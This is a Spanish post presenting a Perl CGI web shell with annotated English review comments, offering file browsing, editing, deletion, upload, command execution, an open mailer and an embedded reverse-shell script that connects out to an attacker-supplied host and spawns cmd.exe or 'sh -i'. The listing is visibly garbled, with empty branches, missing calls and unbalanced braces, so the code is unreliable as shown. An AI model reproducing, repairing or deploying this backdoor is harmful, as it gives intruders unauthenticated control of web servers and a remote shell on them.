Hoy he terminado de hacer una shell en CGI. Estas shells se usan en las páginas que permiten ejecutar archivos CGI y que tienen el directorio cgi-bin.
Esta shell tiene las siguientes opciones (nota: no incluye ningún tipo de autenticación, así que cualquiera que conozca la URL puede usarla con los privilegios del servidor web):
* Listar directorios
* Ver y editar archivos
* Eliminar archivos y directorios
* ReverseShell
* Subir archivos a un directorio especificado
* Ejecutar comandos
* Enviar mails
Código (el listado tal como se publicó está dañado: se han perdido saltos de línea y varios fragmentos del código, por lo que no funciona tal cual)
#!"\xampp\perl\bin\perl.exe"
#
# CGI Shell 0.1
#
# (C) Doddy Hackman 2011
#
# NOTE(review): this is a web shell (a remote-administration backdoor meant
# to be dropped into a cgi-bin directory).  It has NO authentication of any
# kind: every request parameter below is trusted verbatim and turned into a
# file-system, mail or process action, so anyone who can reach the URL gets
# the web server's privileges.  Run it only on hosts you own or are
# authorised to test.
#
# NOTE(review): the listing as published is garbled.  Several branch bodies
# are empty (`{ }`), the `open`/`opendir` calls that must precede
# `close FILE` / `close DIR` are missing, `$send` is used without a
# `Net::SMTP->new`, `@archivos` is never filled, `$rta{'port'}` is never
# read and the braces do not balance.  The code is kept byte-for-byte
# below; the comments describe what survives, not a working tool.
#
# Runs without `use strict`/`use warnings`: $code, $send, @words and
# @archivos are undeclared package globals.
use CGI;
use Cwd;
use HTML::Entities;   # loaded, but no encode_entities() call survives
use Net::SMTP;

# %rta: every CGI parameter copied into a plain hash.  param($_) is called
# in scalar context, so only the first value of a multi-valued field is
# kept.  `new CGI` is the old indirect-object spelling of CGI->new.
my %rta;
my $que = new CGI;
my @ques = $que->param;
for(@ques) { $rta{$_} = $que->param($_); }

# Page header and CSS.  NOTE(review): nothing in the visible code emits an
# HTTP header (e.g. `$que->header`) before this HTML; a CGI that starts
# with a body would normally make the server answer 500.  Possibly lost in
# extraction.
print " <style type=text/css> .main { margin : -287px 0px 0px -490px; border : White solid 1px; BORDER-COLOR: #00FF00; } #pie { position: absolute; bottom: 0; } body,a:link { background-color: #000000; color:#00FF00; Courier New; cursor:crosshair; font-size: small; } input,table.outset,table.bord,table,textarea,select { font: normal 10px Verdana, Arial, Helvetica, sans-serif; background-color:black;color:#00FF00; border: solid 1px #00FF00; border-color:#00FF00 } a:link,a:visited,a:active { color: #00FF00; font: normal 10px Verdana, Arial, Helvetica, sans-serif; text-decoration: none; } </style> <title>CGI Shell (C) Doddy Hackman 2011</title> <h2><center>CGI Shell</center></h2> ";

# Upload branch (multipart POST field `filex`, target dir `todir`): the
# body was lost; only `close FILE` and a stray closing brace survive.
if ($rta{'filex'}) { }
close FILE;
}

# Save-edited-file branch (`codefile`): body lost except `close FILE`.
# The editor form below posts the path as `filecode`, not `codefile` —
# presumably the missing code bridges the two; verify against a full copy.
if ($rta{'codefile'}) { close FILE; }

# View/edit branch (`loadfile`): slurps the file into @words (the matching
# `open FILE` is missing) and renders a Save form.  The caller-supplied
# path is echoed into the HTML unescaped -> reflected XSS; HTML::Entities
# is loaded but not used here.
if ($rta{'loadfile'}) {
    if (-f $rta{'loadfile'}) {
        @words = <FILE>;
        close FILE;
        for (@words) { }
        print " </textarea></center> <input type=hidden name=filecode value=".$rta{'loadfile'}."> <br><br><center><input type=submit value=Save></center><br><br> </form> ";
    }
}

print " <br><br> <b>Console</b> <br><br> <fieldset>";

# Action dispatch.  Each branch acts directly on request parameters; the
# command-execution body (`cmd`) is entirely missing from the listing.
if ($rta{'cmd'}) { }
elsif ($rta{'mail'}) {
    # Open mail relay: From, To, Subject and Body are all caller-controlled
    # and concatenated straight into the SMTP DATA, so embedded newlines
    # inject extra headers.  $send is never constructed in the visible code.
    $send->mail($rta{'mail'});
    $send->to($rta{'to'});
    $send->data();
    $send->datasend("To:".$rta{'to'}."\n"."From:".$rta{'mail'}."\n"."Subject:".$rta{'subject'}."\n".$rta{'body'}."\n\n");
    $send->dataend();
    $send->quit();
}
elsif ($rta{'loadir'}) {
    # Directory listing of an arbitrary caller-supplied path; the
    # `opendir`/`readdir` that should fill @archivos are missing.
    if (-d $rta{'loadir'}) {
        close DIR;
        for(@archivos) {
            if (-d $_) { } else { }
        }
    }
}
# Delete-file / delete-directory branches: the enclosing
# `elsif ($rta{'delfile'}) { if (...)` style wrappers appear to have been
# lost, leaving an `elsif` after an `else` and unbalanced braces.
elsif (-f $rta{'delfile'}) { } else { }
}
elsif (-d $rta{'deldir'}) { } else { }
}
elsif ($rta{'ipconnect'}) {
    # Reverse-shell branch.  $code is a standalone Perl script that connects
    # to <host> <port>, dups STDIN/STDOUT/STDERR onto the socket and then
    # runs cmd.exe (Win32) or `sh -i`; the code that writes it to disk and
    # launches it against `ipconnect`:`port` is missing, only `close FILE`
    # remains.  NOTE(review): the line breaks inside this single-quoted
    # string were lost in extraction, so as shown every `#` comment swallows
    # the rest of its line; the shebang also lacks its leading `/`.
    $code = ' #!usr/bin/perl #Reverse Shell 0.1 #By Doddy H use IO::Socket; print "\n== -- Reverse Shell 0.1 - Doddy H 2010 -- ==\n\n"; unless (@ARGV == 2) { print "[Sintax] : $0 <host> <port>\n\n"; exit(1); } else { 
print "[+] Starting the connection\n"; print "[+] Enter in the system\n"; print "[+] Enjoy !!!\n\n"; conectar($ARGV[0],$ARGV[1]); tipo(); } sub conectar { socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp")); connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0]))); open (STDIN,">&REVERSE"); open (STDOUT,">&REVERSE"); open (STDERR,">&REVERSE"); } sub tipo { print "\n[*] Reverse Shell Starting...\n\n"; if ($^O =~/Win32/ig) { infowin(); system("cmd.exe"); } else { infolinux(); #root(); system("export TERM=xterm;exec sh -i"); } } sub infowin { print "[+] Domain Name : ".Win32::DomainName()."\n"; print "[+] OS Version : ".Win32::GetOSName()."\n"; print "[+] Username : ".Win32::LoginName()."\n\n\n"; } sub infolinux { print "[+] System information\n\n"; system("uname -a"); print "\n\n"; } #The End ';
    # OS switch, body lost.  `/g` in scalar context advances pos($^O); it
    # works once per process but is fragile if the test is repeated.
    if ($^O =~/Win32/ig) { } else { }
    close FILE;
    # BUG: `==` is numeric comparison; both operands numify to 0 (with a
    # warning), so this is always true.  `eq` was intended.
    if ($^O == "MSWin32") { } else { }
}
else {
    # Default action: list the current directory (opendir/readdir lost).
    close DIR;
    for(@archivos) {
        if (-d $_) { } else { }
    }
}

# Control forms.  All but the upload use GET, so commands, paths and mail
# bodies end up in the server access log and the browser history; the
# current directory from getcwd() is interpolated into unquoted, unescaped
# attribute values.
print "</fieldset> <br><br> <form action='' method=GET> <b>Command</b> : <input type=text name=cmd size=100 value=ver><input type=submit value=Send><br> </form> <form action='' method=GET> <B>Load directory</B> : <input type=text size=100 name=loadir value=".getcwd()."><input type=submit value=Load> </form> <form action='' method=GET> <b>Load File</b> : <input type=text size=100 name=loadfile value=".getcwd()."><input type=submit value=Load> </form> <form action='' method=GET> <b>Delete File</b> : <input type=text size=100 name=delfile value=".getcwd()."><input type=submit value=Del> </form> <form action='' method=GET> <b>Delete Directory</b> : <input type=text size=100 name=deldir><input type=submit value=Del> </form> <form enctype='multipart/form-data' method=POST> <br><b>Upload File</b> : <input type=file name=filex><br><br> <b>To dir</b> : <input type=text name=todir value=".getcwd()."><br><br> <input type=submit value=Upload> </form> <br><B>Mailer</b><br><br> <form action='' method=GET> <b>Mail</b> : <input type=text 
name=mail><br> <b>To</b> : <input type=text name=to><br> <b>Subject</B> : <input type=text name=subject><br> <B>Body</B> : <input type=text name=body><br><br> <input type=submit value=Send> </form> <br><br><b>ReverseShell</b><br><br> <form action='' method=GET> <b>IP</B> : <input type=text name=ipconnect><br> <b>Port</B> : <input type=text name=port><br> <br><input type=submit value=Connect></form><br><br> ";
# The End (original closing remark)